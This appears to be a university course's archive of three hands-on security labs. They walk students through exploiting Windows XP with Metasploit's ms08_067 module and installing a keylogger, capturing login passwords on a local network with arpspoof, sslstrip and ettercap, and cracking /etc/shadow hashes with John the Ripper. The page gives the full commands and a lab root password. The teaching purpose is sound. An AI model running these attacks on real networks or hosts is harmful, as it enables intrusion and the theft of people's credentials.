Category Archives: Lab

In-class exercises 3 Using Armitage and metasploit to attack a host and install a key logger

You need a WinXP and Kali VMs.  Make sure the network adapters of them were set into Bridged Adapter mode. In our labs, the victims can be any computers in the same local network. To keep us safe, we use WinXP as a target. I will share with you these two VMs.

 

  • Start your Windows XP, Turn off your firewall (Start->Settings->Control panel->Security Center->Windows Firewall->Turn off). Download HoneyBot through Blackboard. Install it and run the HoneyBot. Record your Windows XP’s ip address.
  • Turn off your firewall in WinXP.
  • Start metasploit service in Kali. root@kali:
  • service postgresql      start
  • service metasploit start
  • Start Armitage. root@kali:  armitage, then click connect.
  • It prompts up a question related to RPC server. Click Yes.
  • In Armitage, host->clear database
  • Host->add host->input your WinXp’s IP address
  • Host->msf scan
  • Select your host
  • Attacks->find attacks
  • Right click the host, you will see “attacks”, then choose iis->iis_webdav_upload->launch.
  • You will see this attack failed.
  • Right click the host, you will see “attacks”, then choose smb->ms08_067_netapi, then check “use a reverse connection”, ->launch.
  • You will see your WinXP is attacked. Save a screen as follows:
  • 6
  • After you successfully conducted an attack, you can do anything you want.
  • Right click the host -> Meterpreter 1-> Explore->Log keystokes->lauch
  • 5
  • Go to WindowXp, login your gmail account.
  • Go back to Kali, take a screen image and turn it in.
  • You need to try all others under Explore option. Record the work you have done.
  • Go to Windows XP, Turn on your firewall (Start->Setteings->Control panel->Security Senter->Windows Firewall->Turn on). Repeat 7-20. Take a screenshot image.
  • Make your comments to this lab.
  • Submit your report to the Blackboard.

4

 

In-class exercise 2: Sniff the https passwords using sslstrip in Kali linux

What you need:  Kali101 Linux  and Windows XP VMs.

Import them in your Virtual box.

User name of kali: root      PWD: SCIA472    (They are Shift+S  Shift+S Shift+I Shift+A 472).

This lab can steal all the passwords in a subnet. Please set the network of them to bridged adapter mode, turn off the firewall of Win XP, and give the WinXP 1024M memory.

1 Find you default gateway and interface connected with the victim in Kali:   netstat  -r

1

In this lab,  it should be   192.168.0.1 and the interface is eth0. Write down them for later reference.

2 Find your WinXP’s IP address (it is the victim) in Window XP:  ipconfig  /all

Write your victim’s IP address.

3 Start a new terminal in Kali, type the following command:

echo  1  >  /proc/sys/net/ipv4/ip_forward

This command enables ip forwarding by writing the value 1 in the file specified path.

Remember to do any MITM we need our box to act like a router and be able to forward packets that does not have its ip address in it as the destination.

4 Now we need to set up iptables, so that it will redirect traffic from port 80 to port 10000.

iptables  -t nat -A PREROUTING -p tcp  –destination-port 80 -j REDIRECT –to-port 10000

It starts iptables. –t=tables, nat=this table is consulted when a packet that creates a new connection is encounted. –A is an instruction to append one or more rules to the accepted chain. PREROUTING is one of the built-ins of the NAT table option. It is for altering packets as soon as they come in. –p specifies a protocol, in this case we said tcp. –destination-port we specify port 80 as the destination port. –j specifies an action. And we follow that with the action of redirect (REDIRECT). We redirect to port 10000 because this is the port sslstrip listens on by default.

5 Now just open up another terminal and get ip address of your victim (ip address of your Windows XP).

6 arpspoof  -i  eth0 (your interface)  -t    victim’s ip (WinXp’s address)     default gateway’s ip (192.168.0.1)

-t= target, Arpspoof basically sends arp replies to the target (you WinXp’s address).

The second ip is gateway’s ip, which is the ip we are “pretending” to be. Essentially we are telling the target that we are the gateway.

7 sslstrip   -k    -l   10000  -w  /root/Desktop/sslstrip.log

-k= kill all the sessions in the progress (forces the target ssl session to restart if already going, allows for the tool to work on sessions already established),  -l= listening on port 10000. –w=write the logs into /root/Desktop/sslstrip.log file.

Now tracking the log file which sslstrip produces.

8 In your 1st terminal in Kali:   tail  -f  /root/Desktop/sslstrip.log

 

10  In Windows XP,  Open IE explore, delete history files,  login your  amazon account and gmail account using a fake password. (you can try the online bank account later).

11  You will see the passwords in plain text  in terminal and sslstrip.log

Take a screenshot showing this in Kali by Applications->Accessories->Screenshot

12  In Windows Xp, Open Firefox,   login your facebook and gmail accout

13  What’s the difference between this results and the previous results?

14 Submit a screen image like this to Blackboard.

2

Refer to: http://robospatula.blogspot.com/2013/12/man-in-the-middle-attack-arpspoof-sslstrip.html

Extra bonus:  (3 points)

15  Open a new terminal:

ifconfig eth0 down

macchanger    -mac  00:22:33:44:55:66    eth0 (my interface)

ifconfig  eth0  up

16  ettercap  -T   -q  -M  arp:remote   /victim’s ip/    /gateway’s ip/

(there is no space between / and IP address)

-T simply specifies text only mode. –q specifies quiet mode. Does not print packet content (since we don’t need this). –I eth0 specifies ethernet 0 as the interface to listen on.

17  sslstrip   -k    -l   10000 -w  /root/Desktop/ettercap.log

In Windows Xp,  start IE explore, login your gmail account. Return to kali machine,

18 Open a new terminal:

tail -f /root/Desktop/ettercap.log  

You can see the passwords in the terminal. Save a screen image.

19 Write down your comments on this lab at the end of your report.

20 Turn it in Blackboard.

In-class Exercise 1: Cracking Passwords with John the Ripper

In-class Exercise 1: Cracking Passwords with John the Ripper (Sharon)

Password protection is important in any platform as is building robust passwords. You will need a copy of Kali Linux, as discussed previously, to perform this exercise. John and Ripper will be used to crack passwords. John performs different types of cracks: single mode; dictionary (wordlist mode), the one performed in this exercise, which applies a dictionary list of passwords for comparison; and brute-force (incremental) mode, which is the slowest of the three modes and attempts every combination of letters and numbers. You can download the Kali Linux and WinXP VMs at   http://ciswww.desu.edu/~xhei/

  • Start Kali virtual machine.
  • Login: root   Password:  SCIA472

Before attempting to crack the existing passwords, enter a few more users to see how fast the passwords can be cracked.

  • root@kali: adduser user1
  • set the password to password
  • root@kali: adduser  user2
  • set the password to P@ssw0rd
  • root@kali: adduser  user3
  • set the password to !P@ssw0rD1

After the three users have been added, you will want to execute John.

  • ApplicationsàBackTrack->Provilege Escalation->Password Attacks->Offline Attacks-> john the ripper
  • root@kali:/pentest/passwords/john#: john /etc/shadow
  • Give it time to see how long it takes for each password to be cracked. Record those times here: User1:______ User2:_______User3:______
  • Refection: Did you notice a correlation between the times it took to crack a password versus the complexity of the password? You should have seen that more complex passwords take longer to recover.
  • Write your comment to this exercise including what you have learned, more practices you can think of, and what can be improved about this exercise.
  • Turn it in Blackboard by Tonight.